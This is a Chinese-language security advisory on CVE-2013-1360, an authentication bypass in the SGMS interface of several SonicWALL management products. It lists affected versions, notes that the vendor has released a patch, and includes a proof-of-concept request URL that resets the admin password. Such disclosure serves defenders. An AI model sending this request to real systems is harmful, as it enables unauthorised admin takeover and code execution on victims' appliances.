多个SonicWALL产品SGMS接口身份验证绕过漏洞
多个SonicWALL产品SGMS接口身份验证绕过漏洞
发布日期:2013-01-17
更新日期:2013-01-22
受影响系统:
SonicWALL GMS/Analyzer/UMA 7.0.x
SonicWALL GMS/Analyzer/UMA 6.0.x
SonicWALL GMS/Analyzer/UMA 5.1.x
SonicWALL GMS/ViewPoint 5.0.x
SonicWALL GMS/ViewPoint 4.1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57446
CVE(CAN) ID: CVE-2013-1360
SonicWALL 提供面向中小型企业与分布式企业的互联网安全解决方案。
SonicWALL Global Management System (GMS), ViewPoint, Universal Management Appliance (UMA), Analyzer在实现上存在身份验证绕过漏洞,通过发送特制请求到SGMS接口,攻击者可利用此漏洞以管理员权限访问Web接口,导致以系统级别权限执行任意代码。
<*来源:Nikolas Sotiriu
链接:http://securitytracker.com/id/1028007
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 00000000001
建议:
--------------------------------------------------------------------------------
厂商补丁:
SonicWALL
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sonicwall.com
评论暂时关闭